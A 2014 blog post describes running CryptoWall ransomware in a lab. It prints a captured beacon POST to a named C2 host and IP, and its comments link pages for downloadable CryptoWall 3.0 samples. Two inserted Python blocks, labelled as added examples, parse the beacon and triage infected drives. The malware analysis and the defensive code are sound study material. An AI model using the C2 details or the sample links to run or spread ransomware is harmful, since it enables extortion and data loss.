What, am I crazy?
No, I have a lab set up with a DMZ and loads of protection. I just need to download and run Cryptowall as my final step. My setup includes some sample data to encrypt, Wireshark for packet sniffing and Sysinternals Process Monitor.
So, let the fun begin. Thanks to the antivirus companies out there (Trend Micro etc.) this is harder than I thought. I also had to dumb down my SonicWall firewall to let viruses through. The antivirus companies have been taking down the virus URLs faster than I can check them. It took ages to locate and download the Document-128_712.zip file. Awesome to see the AV companies are on top of their game.
So I had to bypass the built-in Internet Explorer protection (it also wanted to kill my download) and finally I have Document-128_712.zip. I extracted the contents: Document-128_712.scr, with a PDF icon. I double-click the screensaver file (an executable in disguise) and the file vanishes. The mouse cursor turns to an hourglass for a second and then nothing. I refer to Wireshark and Process Monitor; they are blitzing past recording data.
There is nothing on the desktop to indicate what is happening (except the hard disk light flashing). If I had been caught by this, I might be tempted to double-click it again and again, as nothing appears to happen.
As this thing encrypts alphabetically, I wait until I start seeing the signs of the encryption appearing in the hard drive subfolders and then create a folder called "a", as in C:\a. It is safe, as the process does not seem to double back once it has passed a letter of the alphabet, so it is a nice place to save logs etc. So, here come the screenshots; some from this current experiment, some from an actual infection.
So here is the .scr file, renamed to bd99547.exe. It is the same file as Document-128_712.scr, as the hashes are the same. It is in the Startup group, so if you restart your PC it continues to encrypt.
Now, showing all hidden files on the C:\ drive, I find a hidden folder with the same exe file in it.
So I let this thing continue and do its job. The exe file located in the Start Menu Startup folder and the one on C:\ will vanish later. I watch as Process Monitor shows me the exe I ran using Windows' built-in cryptography to encrypt everything. I note that the malware does not need to download anything from the internet: Microsoft have already provided everything it needs. It is using Microsoft's own tools to hold us to ransom.
I watch it connect to 199.127.225.232 and do an HTTP POST. This server is called babyslutsnil.com:
POST /da2c5yzx438 HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
Connection: Close
Content-Length: 100
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; Tablet PC 2.0; .NET4.0E)
Host: babyslutsnil.com
Cache-Control: no-cache
z=109a242f761c53dbf5fa7883a817baff7b6f70eec0b2c20b9c59a99d5e6ddcb49ed56d8d6082a4df4909c8600c5850ad16

HTTP/1.1 500 Internal Privoxy Error
Date: Sun, 29 Jun 2014 23:41:14 GMT
Content-Length: 778
Content-Type: text/html; charset=UTF-8
Cache-Control: no-cache
Last-Modified: Sun, 29 Jun 2014 23:41:14 GMT
Expires: Sat, 17 Jun 2000 12:00:00 GMT
Pragma: no-cache
Connection: close

<html>
<head>
<title>500 Internal Privoxy Error</title>
<link rel="shortcut icon" href="http://config.privoxy.org/error-favicon.ico" type="image/x-icon"></head>
<body>
<h1>500 Internal Privoxy Error</h1>
<p>Privoxy encountered an error while processing your request:</p>
<p><b>Could not load template file <code>forwarding-failed</code> or one of its included components.</b></p>
<p>Please contact your proxy administrator.</p>
<p>If you are the proxy administrator, please put the required file(s) in the <code><i>(confdir)</i>/templates</code> directory. The location of the <code><i>(confdir)</i></code> directory is specified in the main Privoxy <code>config</code> file. (It's typically the Privoxy install directory, or <code>/etc/privoxy/</code>).</p>
</body>
</html>
I can only assume it is trying to send out the RSA encryption key to the remote server. Note that the 500 response above did not come from babyslutsnil.com at all: it is Privoxy's own error page for its "forwarding-failed" template, which means a Privoxy proxy in the path accepted the POST and could not forward it on. In this particular capture, then, the beacon never reached the server; the request itself (the host, the random-looking path and the hex-only "z=" body whose 100 bytes match the Content-Length exactly) is the part worth keeping as an indicator.
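To turn the capture above into something a responder can reuse, here is a small Python parser that separates the POST from the reply Wireshark glued onto it, checks the request against a handful of beacon heuristics, and works out who actually answered. This is an added example, not code from the original post: the request and response text is reconstructed from the capture shown above, the scoring rules (short random-looking POST path, a body that is a single hex-only form field, a body length that matches Content-Length exactly, "Connection: Close" sent with an MSIE user agent) are this example's own assumptions about what separates the beacon from browser traffic, and the IOC set is seeded only with the host and IP the post names.

```python
"""Pull apart the beacon captured in the post and score it as a C2 check-in.

Added example, not code from the original post. The heuristics below are
assumptions about what sets this beacon apart from browser traffic; KNOWN_C2
holds only the host and IP the post names.
"""
import re

KNOWN_C2 = {"babyslutsnil.com", "199.127.225.232"}   # from the post's capture

# Constructed from the post's capture: the stream view glues the POST body
# straight onto the status line of the reply that came back.
CAPTURE = (
    "POST /da2c5yzx438 HTTP/1.1\r\n"
    "Accept: */*\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "Connection: Close\r\n"
    "Content-Length: 100\r\n"
    "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/6.0; "
    "SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; "
    "Media Center PC 6.0; .NET4.0C; Tablet PC 2.0; .NET4.0E)\r\n"
    "Host: babyslutsnil.com\r\n"
    "Cache-Control: no-cache\r\n"
    "\r\n"
    "z=109a242f761c53dbf5fa7883a817baff7b6f70eec0b2c20b9c59a99d5e6ddcb49ed56d8d6082a4df4909c8600c5850ad16"
    "HTTP/1.1 500 Internal Privoxy Error\r\n"
    "Date: Sun, 29 Jun 2014 23:41:14 GMT\r\n"
    "Content-Length: 778\r\n"
    "Content-Type: text/html; charset=UTF-8\r\n"
    "Connection: close\r\n"
    "\r\n"
    "<html><head><title>500 Internal Privoxy Error</title></head><body>...</body></html>"
)


def parse_http(raw):
    """Split a request or response into (start line, headers, body, rest).

    The body is cut at Content-Length, which is exactly what separates the
    POST body from the reply that the stream view fused onto its end.
    """
    head, _, rest = raw.partition("\r\n\r\n")
    start_line, *header_lines = head.split("\r\n")
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    length = int(headers.get("content-length", "0"))
    return start_line, headers, rest[:length], rest[length:]


def score_beacon(raw):
    """Return the facts a responder wants from one captured exchange."""
    request_line, req_headers, body, rest = parse_http(raw)
    method, path, _version = request_line.split(" ", 2)
    host = req_headers.get("host", "")
    indicators = []
    if host in KNOWN_C2:
        indicators.append("host is a known C2")
    if method == "POST" and re.fullmatch(r"/[a-z0-9]{8,16}", path):
        indicators.append("short random-looking POST path")
    if re.fullmatch(r"[a-z]=[0-9a-f]{32,}", body):
        indicators.append("body is a single hex-only form field")
    if len(body) == int(req_headers.get("content-length", "-1")):
        indicators.append("body length matches Content-Length")
    if (req_headers.get("connection", "").lower() == "close"
            and "MSIE" in req_headers.get("user-agent", "")):
        indicators.append("Connection: Close with an MSIE user agent")

    # Whatever followed the body is the reply; check who actually answered.
    status_line, _resp_headers, _, _ = parse_http(rest)
    status = int(status_line.split(" ")[1]) if status_line.startswith("HTTP/") else None
    return {
        "host": host,
        "path": path,
        "body_length": len(body),
        "indicators": indicators,
        "response_status": status,
        # Privoxy names itself in the status line: the real server never saw the POST.
        "answered_by_proxy": "Privoxy" in status_line,
    }


if __name__ == "__main__":
    for key, value in score_beacon(CAPTURE).items():
        print(f"{key}: {value}")
```

Run against the capture, every heuristic fires, the body is reported as exactly 100 bytes and the reply is attributed to the proxy rather than to the C2. Treat the host and IP as the time-limited indicators they are; the structural checks on the request are what survive the domain being swapped out.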
Then you start seeing the encrypted files in folders, alongside additional files (DECRYPT_INSTRUCTION).
Then you find a key in the registry whose name starts with the same string as the exe file name,
and then the exes start to vanish and are replaced with the warnings you will see on the next reboot.
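The on-disk traces described so far (ransom notes left in each folder, files overwritten with ciphertext in alphabetical order, and a dropper that turns up under two names with the same hash) are enough for a first triage of an infected drive. The Python below walks a tree in the same alphabetical order the malware uses, collects the folders holding a DECRYPT_INSTRUCTION note, flags files whose byte entropy looks like ciphertext, reports how far down the alphabet the notes reach, and groups .exe/.scr files by SHA-256 so that a renamed copy is caught by content rather than by name. This is an added example, not the post's own tooling: build_sample_drive() creates a throwaway directory standing in for the infected C:\ drive, so every folder and file name in it, the file contents and the 7.5 bits-per-byte entropy threshold are constructed for this example.

```python
"""Triage a file tree for the traces the post describes: ransom notes,
high-entropy files beside them, how far through the alphabet the encryption
got, and dropper copies that share a hash but not a name.

Added example, not the post's own code. The sample tree, its contents and
the entropy threshold are constructed for this example.
"""
import hashlib
import math
import os
import random
import tempfile
from collections import Counter

NOTE_PREFIX = "DECRYPT_INSTRUCTION"   # the note name seen in the post
DROPPER_EXTS = (".exe", ".scr")
ENTROPY_THRESHOLD = 7.5                # assumption: ciphertext sits close to 8 bits/byte
SAMPLE_BYTES = 1 << 20                 # the first MiB is enough to judge entropy


def shannon_entropy(data):
    """Bits of entropy per byte: 0.0 for empty input, at most 8.0."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def sha256_of(path):
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def triage(root):
    """Walk root in the alphabetical order the malware uses and report."""
    note_dirs, encrypted, by_hash = set(), [], {}
    for dirpath, dirnames, filenames in os.walk(root):
        dirnames.sort()                       # in-place sort steers os.walk's order
        rel_dir = os.path.relpath(dirpath, root)
        for name in sorted(filenames):
            path = os.path.join(dirpath, name)
            rel_path = os.path.relpath(path, root)
            if name.startswith(NOTE_PREFIX):
                note_dirs.add(rel_dir)
            elif name.lower().endswith(DROPPER_EXTS):
                by_hash.setdefault(sha256_of(path), []).append(rel_path)
            else:
                with open(path, "rb") as f:
                    if shannon_entropy(f.read(SAMPLE_BYTES)) >= ENTROPY_THRESHOLD:
                        encrypted.append(rel_path)
    # The top-level folders holding a note show how far down the alphabet it got.
    letters = sorted(d.split(os.sep)[0][0].lower() for d in note_dirs if d != ".")
    return {
        "note_dirs": sorted(note_dirs),
        "encrypted": encrypted,
        "furthest_letter": letters[-1] if letters else None,
        # Same hash under different names: the renamed .scr and its hidden copy.
        "dropper_copies": {h: p for h, p in by_hash.items() if len(p) > 1},
    }


def build_sample_drive():
    """Constructed stand-in for the drive in the post; returns its path."""
    root = tempfile.mkdtemp(prefix="cw_lab_")
    rng = random.Random(20140629)          # deterministic 'ciphertext' and dropper
    noise = lambda n: bytes(rng.getrandbits(8) for _ in range(n))
    plaintext = b"The quick brown fox jumps over the lazy dog. " * 200
    dropper = b"MZ" + noise(2048)
    files = {
        # folders already passed: note dropped, contents replaced with ciphertext
        "Documents/report.docx": noise(8192),
        "Documents/DECRYPT_INSTRUCTION.TXT": b"Your files are encrypted...",
        "Music/song.mp3": noise(8192),
        "Music/DECRYPT_INSTRUCTION.TXT": b"Your files are encrypted...",
        # folders not reached yet, plus the 'a' folder created after the fact
        "Photos/captions.txt": plaintext,
        "Work/plan.txt": plaintext,
        "a/procmon-notes.txt": plaintext,
        # dropper: renamed .scr in Startup, identical copy in a hidden folder
        "Users/lab/Start Menu/Programs/Startup/bd99547.exe": dropper,
        ".cw_hidden/Document-128_712.scr": dropper,
    }
    for rel, data in files.items():
        path = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "wb") as f:
            f.write(data)
    return root


if __name__ == "__main__":
    for key, value in triage(build_sample_drive()).items():
        print(f"{key}: {value}")
```

On the sample tree the report places the notes in Documents and Music, puts the furthest letter at "m" (so a folder named "a" created now would indeed sit behind the sweep, as the post found), and pairs the Startup exe with the hidden .scr under one hash. Two caveats for real drives: genuinely compressed formats (docx, mp3, jpg) already score close to 8 bits per byte, so entropy on its own is noisy and the note beside the file plus the hash match are the stronger evidence; and the registry key the post mentions needs a Windows-only check (the winreg module) that this portable example deliberately leaves out.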
Then you get invited to go up, pay some money, download another exe file (do you trust it?) with the decryption and away you go!
It uses the Tor network for the website, so there is no practical way to track these guys. They are anonymous and invisible.
Now the trick is to get these files and screenshots from C:\a onto my USB key, as when I plug it in, the files on it get encrypted.
Final step: FORMAT THE MACHINE. My packet sniffs and process monitoring have shown me that this malware gets all over your PC.
Don't fix it, reformat it. You can recover files from backups or Volume Shadow Copy, but the underlying OS is now owned by some remote hacker. Don't dice with death!
Moral: have current offline backups!
#1 by Jack on September 23, 2014 - 10:26 pm
Just ran into your post, trying to figure out where it starts encrypting if you have mapped drives. My scenario: 35 PCs with a mapped drive off a NAS, mirroring to another NAS nightly, virus ran on a Friday from 8 to 4 pm. 1/2 of the files in NAS1 encrypted, replicated to NAS2 that night, no one noticed until Monday, nothing we can do at this point it seems. I noticed that on their decrypt page in Tor they don't show the number of encrypted files so I don't think that it finished encrypting even though it downloaded the 3 Decrypt files in 1/2 of the directories. I can't find the machine that infected the drive, have run the ListCwall program on all of them and searched for decrypt, thinking only option is to run Malwarebytes on all, or that someone deliberately ran on a laptop on which they mapped the drive
#2 by mickyj on September 25, 2014 - 10:48 am
In my experience it starts with the local PC, working through the local drives and folders alphabetically. Then it does the same on the network mapped drives.
#3 by sam on September 30, 2014 - 6:02 am
Thanks for putting up this post. I'm actually trying to do exactly what you just did for my school project. Our plan is to analyse the malware by using reverse engineering techniques on it and write a report on it.
The problem is, I haven’t been able to successfully infect my test laptop.
Do you have a copy of the specimen?
Do you know if this specimen still works?
If you are unwilling to give me the specimen, could you at least give me the hash? I want to compare it to the specimen that I currently have.
#4 by mickyj on October 20, 2014 - 12:00 pm
Hello,
I would doubt anyone would keep this file on file and pass it out knowing the damage it causes. All my systems here (where I work on clients' machines) have had the file stripped out. Your best chance of getting this file is to contact someone like VirusTotal, prove what your intentions are with the file and they *may* pass it along.
Even in a test environment, accidents happen and emailing this virus is not the easiest thing to do. If I come across another infection, I will keep you in mind.
thanks
#5 by mickyj on November 7, 2014 - 10:38 am
I now have a copy of Cryptowall. I can send you the hash if you like. Else you can contact VirusTotal and see if you can get the hashes from them.
#6 by isaac on October 8, 2014 - 5:55 am
We're doing the same thing, but man I am having a really hard time actually infecting myself here. Any idea where I can purposely download and infect my test lab?
Thanks!
#7 by mickyj on October 20, 2014 - 11:59 am
Hello,
I would doubt anyone would keep this file on file and pass it out knowing the damage it causes. All my systems here (where I work on clients' machines) have had the file stripped out. Your best chance of getting this file is to contact someone like VirusTotal, prove what your intentions are with the file and they *may* pass it along.
Even in a test environment, accidents happen and emailing this virus is not the easiest thing to do. If I come across another infection, I will keep you in mind.
thanks
#8 by mickyj on November 7, 2014 - 10:37 am
I have a version of Cryptowall (not cryptolocker) that arrived in my email this morning. I have zipped it up with a password so I will not infect myself. I still feel a little worried about emailing this to people as it is really damaging 🙁
#9 by Meep! on October 16, 2014 - 4:00 am
I have experienced some very strange behavior with Cryptowall. Namely, the fact that through some strange instance it managed to get onto my PC with absolutely no help, and secondly that it failed to encrypt even a single file. As far as I can tell, there's no damage, Malwarebytes turned up nothing, and the only thing left behind is a large number of DECRYPT_INSTRUCTION in almost all directories. Besides that, no hostile processes are running and nothing is damaged. Any clue as to what's screwed with it?
#10 by mickyj on October 20, 2014 - 11:51 am
I have seen a lot of these lately. I can only guess; however, I would suggest you got it from a webpage where it used a Java exploit to get onto your PC.
I had one do exactly as per your symptoms but as the local Crypto service on the PC was playing up, nothing got encrypted (Crypto locker uses built-in Windows tools and functions to do its work).
There are a large number of "broken" Crypto viruses out there. The writers are testing them out on people to help them write better viruses. Some of the Crypto code has been released to the hackers en masse and the "script kiddies" are trying to get rich quick using this code without understanding it and without making it work correctly. There are now a large number of Cryptolocker/Cryptowall variants and many are broken.
You are just lucky nothing has happened and you got a broken one. I would be thankful if I were you, then backup your data just in case, update your AV and update Java.
#11 by mickyj on November 7, 2014 - 10:35 am
I have recently seen this working through Java from a website. This might explain what has happened to you 🙁
#12 by LesH on October 24, 2014 - 12:18 am
Micky, I was interested in your comment about “dumbing down” your SonicWall to allow the CryptoWall virus through. I have a Sonicwall with GAV and IPS but in our testing the sonicwall allows the PC to infect a test network share with several PDF’s in it. Can you point me in the right direction on how/where to lock down the SonicWall to prevent us from getting hit by this?
Any info would be appreciated. Thanks.
#13 by mickyj on October 28, 2014 - 8:07 am
Hello,
As the original Cryptolocker has now been reinvented many times over by many new hackers and there are even competing viruses out there (e.g. CryptoWall) all with new infection methods, I am finding only certain versions are detected and blocked. Currently the only real way of preventing this and the new versions that use similar attack methods is to use policies, permissions and restrictions on specific areas of the user's profile and system, to prevent the infection executing. Even this is no longer a failsafe as new exploits are being used to get this monster onto systems.
I fear the best protection is to have GAV turned on, use a good trusted local AV, have an email scanner, install the policies on the PC and then teach the users what to look out for.
None of this will guarantee something new will be blocked but it is your best protection.
#14 by Jay Sun on November 26, 2014 - 10:04 am
I have been infected with Crypto Wall 2.0. I did not have a backup and no System Restore. I cleaned the system but I lost one very important Excel file, which was encrypted. How to decrypt the file? I tried hard disk recovery and used various decryptors so far but nothing is decrypting. Is there any research going on? This seems to be the greatest challenge in IT today. No one in the world has decrypted a Crypto Wall 2.0 infected file so far. If so, this is a shame on the entire IT world from Oct 16th 2014
Jay Sun
#15 by mickyj on November 27, 2014 - 4:32 pm
Hello,
The nature of Cryptolocker is that it is encrypted using the very best encryption available. Using the best computer today, it would likely take over 600 years to crack it.
The best hope you have for your file is to email the file to the hacker as most of them will allow you to unlock 1 file as proof that they can do it for you.
They can do it for you as they have the secret key to unlock your file.
#16 by Trooper on December 8, 2014 - 12:11 pm
Excellent writeup!!
On: “have recently seen this working through Java from a website”
For those of us who do not have your level of expertise, is it possible for you to provide a brief description of how this would work, and why the files do not get encrypted?
Many thanks!!
#17 by mickyj on December 8, 2014 - 3:34 pm
Hello,
the infection I saw came from a website showing an image gallery of 20 photos. As you move through the 20 photos (1 photo per webpage) you click the next button at the bottom of the page. Java was the technology used for fading the photo onto the screen and also the menuing system for the page. In the Java code was some malicious code to silently download some files to your internet browser cache and execute them.
This exploited a security issue in the specific version of Java that was installed.
Once the malware has got access to your system and executes, it uses built-in encryption technologies in Windows. Windows can encrypt all kinds of things; in some versions BitLocker can encrypt your whole hard disk. This is normally done at your request and you are normally given the encryption key. In the case of this virus, it takes that key, the final result of a very normal process, and sends it off to where you can't get to it without paying the ransom.
In my test case, my encryption facility in Windows was not working correctly due to some earlier things I was trying 🙂
#18 by Trooper on December 9, 2014 - 2:24 pm
Thank you for the info. Very much appreciated!
At this point, 199.127.225.XXX and babyslutsnil.com connections are being blocked by the AntiVirus and AntiMalware (MBAM) programs. Also, I think svchost.exe is involved.
However, have not found encrypted files, the typical DECRYPT_INSTRUCTION, or a Registry entry, etc.
Is there any action you recommend at this stage?
Also, is there a point in creating a folder called ‘a’ as described above? Since this thing encrypts alphabetically, and no files are encrypted yet, wouldn’t it be detrimental to create the ‘a’ folder and place files in it?
#19 by mickyj on December 9, 2014 - 2:42 pm
Hello,
Yes, the AV companies started blocking those early on. As the hackers make so much money doing this, they have since purchased new domain names and as these are uncovered, they also get blocked.
Maybe your version of the infection has misfired. If you create a folder called “a” and put things in it, nothing will break.
I tried this on one infection and as the virus had already moved on from “a” and was at about “m” it never went back to my new folder to infect it.
#20 by Trooper on December 9, 2014 - 11:16 pm
Thanks again!!
If no files are encrypted yet, wouldn't this malware start with the 'a' folder? What am I missing?
#21 by mickyj on December 12, 2014 - 10:29 am
There are many new versions of this virus out there, most of them will start with "a".
If "a" is not encrypted then either you do not have this virus or the malware has not run correctly and failed.
Count yourself lucky
#22 by Trooper on December 12, 2014 - 11:25 pm
Thank you!!!
IMO, something misfired. Fine with me. 🙂
Have a great holiday season!!!
#23 by mark on January 19, 2015 - 11:46 am
I could really use a copy of any ransomware. A client of mine was recently infected and their IT company is still struggling weeks later cleaning up the mess. But I believe I have a method of blocking the virus from the servers… catching it on the servers, and blocking its ability to encrypt any server-shared files… How can I get myself infected?
#24 by Sriram Iyer on February 2, 2015 - 9:15 pm
Micky, Great write-up. I am trying to test CryptoWALL 3.0. I have a sample from here, https://malwr.com/analysis/MDA0MjIzOGFiMzVkNGEzZjg3NzdlNDAxMDljMDQyYWQ/
My intention is to test my SonicWALL firewall.
I was able to successfully infect two VirtualBox VMs. However, the download of the public key and the subsequent encryption happened after about 2-3 hours and I was unable to capture the traffic.
So I set up packet captures in the SonicWALL firewall as well as within a third VM; copied PPT, PDF and TEXT data and then executed the file from the above site (it’s a bin file which I renamed to exe).
However, in my third attempt the malware does not seem to get the public key to encrypt the files. It does not move past the HTTP POST attempts, which are always reset (TCP RST).
I am sure it is not the SonicWALL firewall because in the first two attempts it was able to infect undetected. And till now no logs are seen in the SonicWALL to indicate that its blocking it.
My questions are:
1. How long does it take from the initial infection to the encryption of files/drives?
2. Does running in a VirtualBox VM stop the malware? I read that CryptoWall 2.0 does not execute its second "layer" if it detects the OS is a VM (as per this blog: https://blogs.cisco.com/talos/Cryptowall-2). I have "end processed" the VirtualBox service. Moreover, in the first 2 attempts it did execute till the end even with the VirtualBox service running.
3. Is the malware sample from malwr.com the right one?
I would appreciate if you would take time to answer my questions and shed light on any other aspect that I may have missed.
#25 by mickyj on February 3, 2015 - 8:58 pm
Hello,
I am very impressed at your testing. Yes, I also used the packet sniffing feature in my Sonicwall and wireshark to pin down how my sample worked but my key was exchanged seconds after the virus was executed and the encrypting began immediately, working alphabetically through the files, folders and drives.
As cryptolocker has been updated and changed a great many times, with many new hackers changing it, who knows what it is you have downloaded and what you really need to test with. As it is changing so frequently, the symptoms between versions also change.
#26 by Sriram Iyer on February 5, 2015 - 12:04 pm
Thanks Micky. I am trying to infect a 4th VM. I have made sure the tasklist does not have VirtualBox in it. I will keep you posted whatever happens.
#27 by pceinc on March 8, 2015 - 1:25 am
Are the IPs and domains used by the Crypto* infections based in the USA? Would geoblocking other countries help prevent the infection from phoning home, thus preventing the encryption process, or is the key generated locally and then sent to the remote servers?
#28 by mickyj on March 10, 2015 - 3:32 pm
Hello,
The key is generated locally and even if it cannot send, the encryption occurs. The remote servers are scattered in many places so geoblocking would not be a good answer 🙁
#29 by bogdan on April 16, 2015 - 2:07 pm
Do you happen to have a sample of cryptowall/3 ?
Please email it to me if you do!
Thank you!
#30 by mickyj on June 1, 2015 - 9:08 am
Hello, I have many samples of many different Cryptowalls, however I am not sure which is version 3. I am very reluctant to pass on samples to anyone.
#31 by John on June 13, 2015 - 12:52 am
So if we disable the Cryptographic Service before we are attacked will that prevent the encryption?
#32 by mickyj on June 22, 2015 - 9:49 am
The latest versions have been enabling it and there are other ways of doing this, so this is not the solution. Trend Micro Worry-Free 9 SP1 with the latest hotfix has the Crypto prevention built in. I believe OfficeScan also has it and Trend services is not far behind.
#33 by Iz_m on July 2, 2015 - 5:25 am
I got myself successfully infected with the Cryptowall 3.0, by downloading it from here:
https://malwr.com/analysis/MTBhNWQ5NjRiZGMzNDIyNGE3Y2VmMGIyOWZjM2I3YTU/
The file needs to be renamed to the original IPv4_updater.exe
It took a minute or two, then I rebooted and bam. Help decrypt everywhere! We are currently working on implementing a Software Restriction Policy to block it from the beginning
#34 by mickyj on July 2, 2015 - 12:13 pm
thanks. I see so many new samples (like Cryptowall 3.0) that I have moved on from the original Cryptolocker.
As my antivirus protects against all cryptos using email/web reputation and also by detecting the crypto process, I am no longer looking for policies to prevent it. I am using Trend Micro Worry-Free 9 with SP1 and the latest hotfix for crypto.
#35 by ran on July 24, 2015 - 4:25 pm
I also want to obtain this virus and test it and many scenarios are coming to my mind to decrypt infected files.
I’ll visit this page again when I have time to test it.
#from ph
#36 by mickyj on July 26, 2015 - 8:04 pm
Hello,
Cryptolocker, Cryptowall, TorrentLocker and many others, have changed a lot since this post. There has been a new version almost every week. There is very little reason to test this old version as things have moved on. Cryptowall 3.0 is of more recent concern.
#37 by Matthew196 on August 9, 2015 - 1:50 pm
I was just wondering, is there any way to keep this virus from entering a computer? I currently have BitDefender Internet Security, VIPRE Internet Security (with AV turned off to prevent fighting between the 2), BitDefender Anti-Ransomware (Crypto Vaccine), Spyhunter 4, Malwarebytes Anti-Malware, and the Cryptoprevent Tool (a tool that changes policies to help stop things from being run in %startup% and %appdata%, along with other protections, from FoolishIt.com).
Is there any other good program I can use with these programs I already have… I'm not a Norton or McAfee fan because they claim they're resource and memory hogs, and I don't use them…
As I was hit by this NASTY Cryptowall 3.0 virus and I didn't even download anything, I think I got it from news websites that have lots of ads.
For me, I was lucky enough to stop the virus before it completed its tasks but the damage it did was still horrific.
#38 by mickyj on August 9, 2015 - 4:09 pm
Hello,
Currently there are new infection methods and new versions constantly coming out. Some can now run even when you are not a local admin and even place files in locations other than AppData and Startup. Some even download the crypto services if you don't have them installed and some are now uninstalling protections. I saw one a week ago that uninstalled Symantec and Vipre on 5 PCs on a network. What I am saying is that there is no magic bullet and as soon as there is, a virus writer finds a way around it.
You are likely doing all you can do. The best protection at the moment is using some form of web reputation service that blocks URLs in your browser. AVG and Trend Micro do this. Even then, you are waiting on them to update their databases of compromised links and this changes hourly.
There are some recent wordpress infections that silently download and execute exe files on your PC, just from visiting the website so yes, anyone can get these nasty things.
#39 by Matthew196 on August 10, 2015 - 8:03 am
Hi again,
Yeah, being an intermediate/advanced computer user myself, it's amazing how stealthy this darn virus really is. Plus encryption was designed to protect people from getting their sensitive information stolen by people like thieves, and now I really cannot believe it that thieves are now using this crap as a weapon against average computer users…
Encryption was never designed to be used like this and I truly hate the idea to think thieves can now use encryption to their advantage. There's some truly sick people out there and I hope the FBI/CIA or even NSA can catch them!!
It's scary what this world is coming to with computers… Encryption is a powerful tool and now they have found ways of weaponizing it, that's as scary as heck!! Especially any encryption at 2048 bit!!
Regardless if it's AES, RSA, Blowfish, and MANY MANY MANY others, they're all powerful!! :/
I just wish there was a way to stop a person from encrypting files on your computer without your explicit consent… Like in such a way all files on your computer cannot be encrypted unless each file has your consent, like a way to prompt a user to confirm each file being encrypted and take automation and silent use outta the process…
#40 by SysAdm1nR on September 9, 2015 - 5:03 am
Hi there,
I've got a lab I'm working on for my company. The plan is to test some "freezing" software for our current clients. I need to infect my lab with many viruses. I know this is a pretty dated article but it's been my best lead so far… I need a copy of CryptoWall 3.x and possibly various others. My lab is a mostly virtual environment not connected to our current network by any means. I've looked around VirusTotal and will post there soon as well. Just hoping to get pointed in the right direction. Thanks!
#41 by Simon on September 15, 2015 - 4:14 am
We have had a similar idea. One of our clients got hit with this recently, Cryptowall 3.0, which leaves behind crypto_help files. Interesting thing is that the encrypted files show their correct extensions, e.g. DOCX, with no obvious sign they are locked. I set up a Linux VM, installed Tor and tried out the test to upload a file and get it back opened up for free. It worked but the client is not willing to pay the ransom… which has to be cheaper than the hours I'm putting in. Anyway, has anyone had any luck in recovering the private key from the infected computer using data recovery software? The key would have possibly resided in the Windows Crypto folder before it was sent off to the remote server. I would also like to infect the same machine with the same malware to see if we can recreate the key that way, any ideas?
Should keep me busy this Autumn if nothing else.
#42 by mickyj on November 9, 2015 - 12:58 pm
This is a great idea and I have not heard anyone try this !
#43 by Rafael S on September 23, 2015 - 11:43 pm
Hey dudes,
I'm enjoying doing analyses of malware via the Cuckoo Sandbox, but I cannot find many samples to test. Do you know where I can get some ransomware or viruses of various kinds?
For those who do not know the Cuckoo is a tool powered by Google, where it is malware testing with it.
#44 by Brian on November 10, 2015 - 7:03 am
Hi, where did you download a copy of the ransomware? I’m interested in doing similar testing to see what measures could prevent it. Thanks!
#45 by mickyj on November 12, 2015 - 2:21 pm
Hello,
Due to the nature of Crypto Wall (Especially version 4) I am extremely careful about handing it out. I only hand it to people whom can show a history of dealing with these types of things and with no malicious intent.
#46 by GrumpyITGuy on November 18, 2015 - 6:49 am
I have had two run-ins with CryptoWall 3 this month.
Typically, I have been able to identify the source computer by the account that’s listed as “owner” on the decrypt files. The first one this month, the owner was “Administrator”, though nobody logs in as administrator. We found the infection because the user fessed up to having clicked a link in an email he didn’t expect.
Second run in, which was really weird, the owner information was listed, and when I scanned the user’s machine, it came up completely clean – This is not the weird part, I believe that he realized something was up, and scanned his own machine, cleaned it out, and went home early… Haven’t proven it yet.
The weird part is that the shadow copy restore points were there. “Great!” I thought. We scanned every system, just in case, and I restored the whole Drive back to before we think the infection hit… it was tough to tell, we had to find all the decrypt files, and then just go to the most recent restore point before the earliest decrypt file…
Anyway, they say things were fine after the restore, which was back to (for example) Tuesday morning at 7am. Later in the day, they found encrypted files, and decrypt_help files again… Though, they can’t swear that they were NOT there in the morning.
Now, the Decrypt_Help files had a modified date of Thursday at 11am… How could it be possible that on Friday morning, after a complete restore via shadow copy back to Tuesday, could there be files from Thursday?
I feel like whatever version this was infected the restore points, much like malware does to workstation system restore…?
#47 by Jayson on April 4, 2016 - 4:03 pm
Hello Micky:
Do you still have the PCAP files with you? Could I ask for a copy?
#48 by mickyj on April 15, 2016 - 7:35 pm
I can certainly try and find them but they are very large.
#49 by Ransomware seeker on April 7, 2016 - 8:34 pm
Hey everyone,
I'm trying to test some ransomware on some isolated VMs with a connection to the internet but none of them encrypt anything… can anyone help please?
Thanks a lot
#50 by headgeek on April 28, 2016 - 5:51 am
Have you done any testing on Windows 10 with Device Guard installed and code integrity policies (basically whitelisting)? I have this working in my lab and am wondering if it is an effective way of blocking ransomware but have no access to the actual ransomware. Thanks
#51 by mickyj on December 16, 2016 - 1:26 pm
Hello,
Generally I don’t hand out the ransomware samples. Ethically, I worry about where the samples end up.
#52 by Larry Fingleton on May 27, 2016 - 6:17 pm
Can anyone send me some ransomware for testing.
info@lexusgroup.com
#53 by mickyj on December 16, 2016 - 1:27 pm
Hello,
Generally, I don’t send samples to requests as I don’t know what the samples are being used for
#54 by ivan on September 6, 2016 - 3:33 am
Hello guys I need or a similar virus to infect a virtual machine and do try to increase security.
Can you help me?
#55 by mickyj on December 16, 2016 - 1:28 pm
Hello,
Generally I don’t supply samples.
#56 by Tom on December 12, 2016 - 10:08 pm
Hi. Got a computer here infected with this CryptoWall 3 and does anyone know how to get my files back? Have been able to get rid of the shit with Norton Power Eraser.